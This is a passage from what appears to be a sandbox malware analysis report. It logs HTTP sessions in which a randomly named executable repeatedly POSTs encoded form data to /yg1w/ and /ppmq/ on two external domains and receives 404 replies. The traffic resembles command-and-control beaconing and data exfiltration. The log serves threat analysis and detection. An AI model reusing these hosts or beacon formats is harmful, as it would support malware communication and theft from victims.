                                                                                                              Data Raw: 51 32 5f 34 3d 4d 39 4a 59 32 47 70 75 49 58 59 51 37 53 36 67 32 72 34 58 67 50 56 79 4c 42 36 48 4b 74 6f 39 77 4c 41 4d 78 41 75 48 4c 32 72 66 4e 37 2b 37 33 50 50 72 6a 50 51 46 39 44 42 75 52 75 5a 76 67 42 47 45 4d 78 7a 47 33 46 6c 6a 4c 35 53 6d 32 63 49 2b 6b 65 6c 59 30 52 58 59 35 51 4c 65 6d 49 72 50 71 4f 44 63 79 43 45 36 34 70 44 71 4b 4f 75 38 77 43 43 48 6b 43 73 42 36 69 6a 71 2f 75 42 78 6a 6b 4e 4f 4b 51 75 72 68 33 49 6b 4e 2b 7a 4b 68 55 57 43 4f 35 63 63 4a 51 36 52 51 69 50 42 49 75 71 6f 49 46 2b 6c 62 5a 48 61 45 70 30 53 49 45 44 6b 59 35 73 44 31 47 67 37 6d 41 3d 3d
                                                                                                              Data Ascii: Q2_4=M9JY2GpuIXYQ7S6g2r4XgPVyLB6HKto9wLAMxAuHL2rfN7+73PPrjPQF9DBuRuZvgBGEMxzG3FljL5Sm2cI+kelY0RXY5QLemIrPqODcyCE64pDqKOu8wCCHkCsB6ijq/uBxjkNOKQurh3IkN+zKhUWCO5ccJQ6RQiPBIuqoIF+lbZHaEp0SIEDkY5sD1Gg7mA==
                                                                                                              Nov 5, 2024 15:35:55.808893919 CET314INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:35:55 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              30192.168.11.204977145.150.55.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:58.329834938 CET737OUTPOST /yg1w/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.983743.vin
                                                                                                              Origin: http://www.983743.vin
                                                                                                              Referer: http://www.983743.vin/yg1w/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 4d 39 4a 59 32 47 70 75 49 58 59 51 35 79 71 67 31 49 51 58 6c 76 56 39 48 68 36 48 45 39 6f 35 77 4b 38 4d 78 42 71 58 4c 46 44 66 4b 65 36 37 32 4b 76 72 32 50 51 46 31 6a 42 72 63 4f 5a 30 67 47 4f 6d 4d 78 50 47 33 46 42 6a 4c 39 57 6d 32 76 67 39 69 4f 6c 61 67 68 58 65 32 77 4c 65 6d 49 72 50 71 4f 58 79 79 43 63 36 2f 5a 54 71 59 2f 75 2f 36 69 44 31 79 53 73 42 2b 69 6a 75 2f 75 42 44 6a 68 6b 54 4b 54 61 72 68 7a 45 6b 4e 50 7a 4c 71 55 57 45 52 70 64 31 4d 69 66 72 65 52 48 71 44 4a 79 55 47 6c 4f 48 54 76 57 41 5a 62 41 32 4c 58 66 57 63 4a 56 72 33 45 68 67 37 49 72 42 52 6b 57 38 63 4e 78 59 68 4f 68 38 46 6b 79 64 73 39 67 3d
                                                                                                              Data Ascii: Q2_4=M9JY2GpuIXYQ5yqg1IQXlvV9Hh6HE9o5wK8MxBqXLFDfKe672Kvr2PQF1jBrcOZ0gGOmMxPG3FBjL9Wm2vg9iOlaghXe2wLemIrPqOXyyCc6/ZTqY/u/6iD1ySsB+iju/uBDjhkTKTarhzEkNPzLqUWERpd1MifreRHqDJyUGlOHTvWAZbA2LXfWcJVr3Ehg7IrBRkW8cNxYhOh8Fkyds9g=
                                                                                                              Nov 5, 2024 15:35:58.640630007 CET314INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:35:58 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              31192.168.11.204977245.150.55.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:01.174194098 CET2578OUTPOST /yg1w/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.983743.vin
                                                                                                              Origin: http://www.983743.vin
                                                                                                              Referer: http://www.983743.vin/yg1w/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 4d 39 4a 59 32 47 70 75 49 58 59 51 35 79 71 67 31 49 51 58 6c 76 56 39 48 68 36 48 45 39 6f 35 77 4b 38 4d 78 42 71 58 4c 44 62 66 4b 73 79 37 33 72 76 72 6b 2f 51 46 2f 44 42 71 63 4f 59 75 67 48 71 69 4d 78 44 57 33 48 4a 6a 45 34 43 6d 30 61 63 39 72 4f 6c 61 69 68 58 66 35 51 4c 4c 6d 49 37 4c 71 4f 48 79 79 43 63 36 2f 62 62 71 50 2b 75 2f 38 69 43 48 6b 43 73 64 36 69 6a 57 2f 75 59 32 6a 68 6f 44 4b 6c 71 72 68 58 6f 6b 4c 74 4c 4c 6e 55 57 47 51 70 64 74 4d 69 6a 4f 65 52 72 6d 44 4e 37 7a 47 6d 75 48 51 72 48 45 4c 4a 77 76 61 52 6a 55 51 64 46 2f 32 33 52 71 6c 5a 72 43 65 46 6e 54 56 4b 67 4a 6e 73 67 33 59 6b 32 2b 77 72 53 46 6e 7a 77 32 4c 4c 63 4c 70 54 74 4c 4f 34 75 58 67 30 66 6d 61 30 77 41 31 73 50 4c 37 35 72 39 2f 67 76 7a 5a 49 33 53 54 2b 49 53 4c 41 53 76 74 59 5a 2f 33 57 57 6b 43 67 5a 4b 57 39 47 78 6f 65 42 43 72 4f 59 79 67 4b 76 47 42 39 41 76 7a 52 38 4b 73 4c 50 33 36 45 79 68 6f 72 69 74 57 73 49 43 67 64 36 5a 2f 38 33 6d 78 77 2b 76 52 49 52 39 7a [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=M9JY2GpuIXYQ5yqg1IQXlvV9Hh6HE9o5wK8MxBqXLDbfKsy73rvrk/QF/DBqcOYugHqiMxDW3HJjE4Cm0ac9rOlaihXf5QLLmI7LqOHyyCc6/bbqP+u/8iCHkCsd6ijW/uY2jhoDKlqrhXokLtLLnUWGQpdtMijOeRrmDN7zGmuHQrHELJwvaRjUQdF/23RqlZrCeFnTVKgJnsg3Yk2+wrSFnzw2LLcLpTtLO4uXg0fma0wA1sPL75r9/gvzZI3ST+ISLASvtYZ/3WWkCgZKW9GxoeBCrOYygKvGB9AvzR8KsLP36EyhoritWsICgd6Z/83mxw+vRIR9zDb7RKT+/ZGSOJOwVlM57XWdWSu2AQR4ZJWYbN9nvxYoh1IXr1hC95WdtiKXH3ZASgKWlooiE8c60GrhIfM+HQH9T1CPCJSxQzCVrs4ijy6jKK6sFnOa29H2nitclEQZj9x01EgH611W5WhkcT8PqhmFNGfNvBL1+w9vf6Rq3F8StFDr+rYc1YyTgxExdpSD0Ze4ZJgnaMY+VK7jHc3MCXORrugBd5GRwSUIJP05R55naQPEAbbiocMl/PpGAU7QTbIFaQVxfgFeMKo98qwyxEffxpGzYcpi/jCiB/r9G6mwv2NmHTkLxx9kibiQF+4rHkytR0py7Es202QOjIBPhlmHGt+TMxzzTPlzLynrLeSFaOLuPKs09t3fFKSgaMOpfPQk8SRD+Dk3UKcF9kM6dWoQ1E1ZPgCLKEtROjA8Q+3HxSeI5CuupXJnrZXeqsFZRTP/DIgn1Xu9alN+OXI/q91Vs8U3XU7GfkwmOLVvV6ZkApg7tjb1kSiHNJ0mS2mcM4nxCQM0LQJH7jZ8iQXi7C0R2quJFuxLV0nNqft82c1C32+qL9KHvg/TaalWRppbH1wNvSgPuSTR3Fa4IoTaq/3x/+1JPWlNV4mDhzQPBrDOWbPvanr7iT/aZ4VONlfFkqQTaJo7/gc8FUUK9OKcW5n9QqQaOPg0FHG [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:01.174261093 CET5308OUTData Raw: 64 33 32 58 56 45 70 6a 6a 68 33 64 36 4a 30 38 63 4c 57 45 65 7a 56 4c 50 31 54 66 36 37 48 55 6f 34 64 67 71 4f 43 79 49 70 61 4b 59 58 50 69 66 53 4e 59 53 55 35 55 4f 49 54 4f 4e 58 2b 70 2b 4c 63 55 4c 2b 7a 30 6d 33 74 4d 74 6c 54 43 6e 65
                                                                                                              Data Ascii: d32XVEpjjh3d6J08cLWEezVLP1Tf67HUo4dgqOCyIpaKYXPifSNYSU5UOITONX+p+LcUL+z0m3tMtlTCnefkRqQGydMjcVt6WSJlt+EJEcupjJOc0R8gxHTgRdY0PvmXkS9NUTml6pe+o3bzniFP3xAab5A9a6xeI4stK4sVa6fAbOS5ZRNxjp5OHw3EadyZGqETPC4Ou6tRsxrRvkQ2RQY26Fdamel7ma+fv0QTRzyYFTRwfLH
                                                                                                              Nov 5, 2024 15:36:01.486511946 CET314INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:36:01 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              32192.168.11.204977345.150.55.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:04.022237062 CET454OUTGET /yg1w/?Q2_4=B/h41wdzKHxv2H2J8JkNr9NyFguRLdtCgIEX5jqCPHbFCbPf8ZDAyvcb9g9cRq9SizS8TlHunVk6R9fe76EcgvsehxPtxmeCiZqIleDJmBUfq+mqOPWirkU=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.983743.vin
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:04.342394114 CET330INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:36:04 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              33192.168.11.204977450.19.214.227804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:09.638406992 CET735OUTPOST /ppmq/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              Origin: http://www.parkerstraus.dev
                                                                                                              Referer: http://www.parkerstraus.dev/ppmq/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 48 54 39 75 74 66 31 2b 45 79 71 67 6f 2b 69 75 67 62 37 72 50 42 62 49 6d 68 78 68 53 6b 30 69 39 47 75 76 71 55 49 57 4c 63 67 62 57 51 6d 64 76 6f 6a 37 71 67 38 50 45 68 78 75 73 45 65 64 39 34 36 57 2b 43 43 30 4b 45 6d 39 42 45 7a 39 79 69 73 37 4c 62 4b 48 31 45 6b 33 43 6b 79 6a 58 62 34 7a 36 34 66 6b 48 39 50 36 64 4b 67 5a 33 2b 32 70 77 75 57 66 70 35 52 34 63 6b 6d 44 6a 62 32 50 31 55 37 48 4a 78 39 59 52 32 76 52 42 58 38 79 56 46 46 49 45 45 53 73 51 7a 43 46 58 61 59 7a 33 32 74 70 59 54 56 49 69 41 2f 4a 4d 45 52 43 2b 33 33 64 57 52 55 62 77 35 67 76 56 51 3d 3d
                                                                                                              Data Ascii: Q2_4=HT9utf1+Eyqgo+iugb7rPBbImhxhSk0i9GuvqUIWLcgbWQmdvoj7qg8PEhxusEed946W+CC0KEm9BEz9yis7LbKH1Ek3CkyjXb4z64fkH9P6dKgZ3+2pwuWfp5R4ckmDjb2P1U7HJx9YR2vRBX8yVFFIEESsQzCFXaYz32tpYTVIiA/JMERC+33dWRUbw5gvVQ==
                                                                                                              Nov 5, 2024 15:36:09.771873951 CET1240INHTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:09 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC29JXT9Z7D0083Z51WAZ4
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                                                              Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:09.771974087 CET1240INData Raw: 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b 6d 61 72 67
                                                                                                              Data Ascii: fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-
                                                                                                              Nov 5, 2024 15:36:09.771981001 CET504INData Raw: 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 3e 0a 66
                                                                                                              Data Ascii: urce=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JBYC29JXT9Z7D0083Z51WAZ4</c


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              34192.168.11.204977550.19.214.227804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:12.281435966 CET755OUTPOST /ppmq/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              Origin: http://www.parkerstraus.dev
                                                                                                              Referer: http://www.parkerstraus.dev/ppmq/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 48 54 39 75 74 66 31 2b 45 79 71 67 6f 65 79 75 6a 38 58 72 59 78 62 4c 70 42 78 68 62 45 31 72 39 47 71 76 71 52 78 4c 4c 4b 34 62 56 77 32 64 2b 64 58 37 6d 41 38 50 4c 42 78 72 76 30 66 77 39 34 32 67 2b 48 36 30 4b 45 43 39 42 46 44 39 79 52 45 30 4b 4c 4b 46 36 6b 6b 31 47 6b 79 6a 58 62 34 7a 36 34 4c 43 48 38 6e 36 65 36 51 5a 30 62 43 6d 75 2b 57 65 67 5a 52 34 59 6b 6d 48 6a 62 33 61 31 56 33 68 4a 33 68 59 52 33 66 52 41 46 55 78 66 46 46 52 5a 30 54 67 57 52 48 4d 64 61 6b 66 78 56 38 31 5a 52 52 4d 75 32 75 54 52 32 6c 6d 39 6b 72 76 53 68 74 7a 79 37 68 30 49 5a 36 34 30 58 6e 31 63 75 6f 63 4b 45 54 30 61 79 34 62 71 35 6b 3d
                                                                                                              Data Ascii: Q2_4=HT9utf1+Eyqgoeyuj8XrYxbLpBxhbE1r9GqvqRxLLK4bVw2d+dX7mA8PLBxrv0fw942g+H60KEC9BFD9yRE0KLKF6kk1GkyjXb4z64LCH8n6e6QZ0bCmu+WegZR4YkmHjb3a1V3hJ3hYR3fRAFUxfFFRZ0TgWRHMdakfxV81ZRRMu2uTR2lm9krvShtzy7h0IZ640Xn1cuocKET0ay4bq5k=
                                                                                                              Nov 5, 2024 15:36:12.408978939 CET1240INHTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:12 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC2C5EK6FZCGARX881VH00
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                                                              Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:12.409024000 CET1240INData Raw: 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b 6d 61 72 67
                                                                                                              Data Ascii: fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-
                                                                                                              Nov 5, 2024 15:36:12.409080029 CET504INData Raw: 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 3e 0a 66
                                                                                                              Data Ascii: urce=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JBYC2C5EK6FZCGARX881VH00</c


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              35192.168.11.204977650.19.214.227804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:14.921763897 CET2480OUTPOST /ppmq/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
